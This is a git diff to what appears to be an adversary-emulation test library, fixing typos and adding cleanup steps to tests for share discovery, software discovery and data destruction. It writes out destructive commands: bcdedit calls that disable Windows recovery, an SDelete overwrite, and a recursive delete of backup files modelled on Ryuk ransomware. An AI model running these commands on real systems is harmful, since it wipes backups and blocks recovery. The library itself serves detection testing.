diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index aead490e..5be02e02 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -26,7 +26,7 @@ Cloud virtual networks may contain remote network shares or file storage service
 
 - [Atomic Test #3 - Network Share Discovery PowerShell](#atomic-test-3---network-share-discovery-powershell)
 
-- [Atomic Test #4 - View avaliabe share drives](#atomic-test-4---view-avaliabe-share-drives)
+- [Atomic Test #4 - View available share drives](#atomic-test-4---view-available-share-drives)
 
 
 <br/>
@@ -97,7 +97,7 @@ get-smbshare -Name #{computer_name}
 <br/>
 <br/>
 
-## Atomic Test #4 - View avaliabe share drives
+## Atomic Test #4 - View available share drives
 View information about all of the resources that are shared on the local computer
 **Supported Platforms:** Windows
 
diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index ebd00c73..332f87b0 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -56,7 +56,7 @@ wbadmin.exe delete catalog -quiet
 <br/>
 
 ## Atomic Test #3 - Windows - Disable Windows Recovery Console Repair
-Disables repair by the Windows Recovery Console on boot. 
+Disables repair by the Windows Recovery Console on boot.
 This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
 
 **Supported Platforms:** Windows
@@ -69,6 +69,11 @@ bcdedit.exe /set {default} recoveryenabled no
 ```
 
 
+#### Cleanup Commands:
+```
+bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
+bcdedit.exe /set {default} recoveryenabled yes
+```
 
 <br/>
 <br/>
@@ -83,11 +88,13 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| file_to_overwrite | Path of file to overwrite and remove | Path | C:\some\file.txt|
+| sdelete_path | Path to sdelete.exe | Path | |
 
-#### Run it with `command_prompt`! 
+#### Run it with `powershell`! 
 ```
-sdelete.exe #{file_to_overwrite}
+New-Item $env:TEMP\T1485.txt
+Set-Location #{sdelete_path}
+.\sdelete.exe -accepteula $env:TEMP\T1485.txt
 ```
 
 
@@ -97,7 +104,6 @@ sdelete.exe #{file_to_overwrite}
 
 ## Atomic Test #5 - macOS/Linux - Overwrite file with DD
 Overwrites and deletes a file using DD.
-
 To stop the test, break the command with CTRL/CMD+C.
 
 **Supported Platforms:** CentOS, Linux, macOS, Ubuntu
@@ -125,7 +131,7 @@ Deletes backup files in a manner similar to Ryuk ransomware.
 **Supported Platforms:** Windows
 
 
-#### Run it with `command_prompt`! 
+#### Run it with `command_prompt`!  Elevation Required (e.g. root or admin) 
 ```
 del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
 ```
diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md
index 1b4f1e39..25766d8b 100644
--- a/atomics/T1518/T1518.md
+++ b/atomics/T1518/T1518.md
@@ -33,10 +33,10 @@ Adversaries may attempt to get a listing of all software that is installed on th
 **Supported Platforms:** Windows
 
 
-#### Run it with `command_prompt`! 
+#### Run it with `powershell`! 
 ```
-POWERSHELL.EXE "Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize"
-powershell.exe "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize"
+Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
+Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
 ```
 
 
diff --git a/atomics/index.md b/atomics/index.md
index 77466f74..e983f144 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -572,7 +572,7 @@
   - Atomic Test #1: Network Share Discovery [macos, linux]
   - Atomic Test #2: Network Share Discovery command prompt [windows]
   - Atomic Test #3: Network Share Discovery PowerShell [windows]
-  - Atomic Test #4: View avaliabe share drives [windows]
+  - Atomic Test #4: View available share drives [windows]
 - [T1040 Network Sniffing](./T1040/T1040.md)
   - Atomic Test #1: Packet Capture Linux [linux]
   - Atomic Test #2: Packet Capture MacOS [macos]
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 0e5fe59c..ad432262 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -15787,9 +15787,9 @@ impact:
 
 '
     - name: Windows - Disable Windows Recovery Console Repair
-      description: "Disables repair by the Windows Recovery Console on boot. \nThis
-        technique is used by numerous ransomware families and APT malware such as
-        Olympic Destroyer.\n"
+      description: |
+        Disables repair by the Windows Recovery Console on boot.
+        This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
       supported_platforms:
       - windows
       executor:
@@ -15798,6 +15798,9 @@ impact:
         command: |
           bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
           bcdedit.exe /set {default} recoveryenabled no
+        cleanup_command: |
+          bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
+          bcdedit.exe /set {default} recoveryenabled yes
     - name: Windows - Overwrite file with Sysinternals SDelete
       description: |
         Overwrites and deletes a file using Sysinternals SDelete.
@@ -15805,19 +15808,19 @@ impact:
       supported_platforms:
       - windows
       input_arguments:
-        file_to_overwrite:
-          description: Path of file to overwrite and remove
+        sdelete_path:
+          description: Path to sdelete.exe
           type: Path
-          default: C:\some\file.txt
+          default: ''
       executor:
-        name: command_prompt
-        command: 'sdelete.exe #{file_to_overwrite}
-
-'
+        name: powershell
+        command: |
+          New-Item $env:TEMP\T1485.txt
+          Set-Location #{sdelete_path}
+          .\sdelete.exe -accepteula $env:TEMP\T1485.txt
     - name: macOS/Linux - Overwrite file with DD
       description: |
         Overwrites and deletes a file using DD.
-
         To stop the test, break the command with CTRL/CMD+C.
       supported_platforms:
       - centos
@@ -15846,8 +15849,11 @@ impact:
       - windows
       executor:
         name: command_prompt
-        command: del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
+        elevation_required: true
+        command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
           c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+
+'
   '':
     technique:
       x_mitre_data_sources:
@@ -17410,7 +17416,7 @@ discovery:
         command: |
           net view \\#{computer_name}
           get-smbshare -Name #{computer_name}
-    - name: View avaliabe share drives
+    - name: View available share drives
       description: View information about all of the resources that are shared on
         the local computer
       supported_platforms:
@@ -18337,11 +18343,11 @@ discovery:
       supported_platforms:
       - windows
       executor:
-        name: command_prompt
+        name: powershell
         elevation_required: false
         command: |
-          POWERSHELL.EXE "Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize"
-          powershell.exe "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize"
+          Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
+          Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
   T1082:
     technique:
       x_mitre_permissions_required:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index a502cd49..d8af5bb9 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -409,7 +409,7 @@
 - [T1135 Network Share Discovery](./T1135/T1135.md)
   - Atomic Test #2: Network Share Discovery command prompt [windows]
   - Atomic Test #3: Network Share Discovery PowerShell [windows]
-  - Atomic Test #4: View avaliabe share drives [windows]
+  - Atomic Test #4: View available share drives [windows]
 - [T1040 Network Sniffing](./T1040/T1040.md)
   - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
   - Atomic Test #4: Packet Capture PowerShell [windows]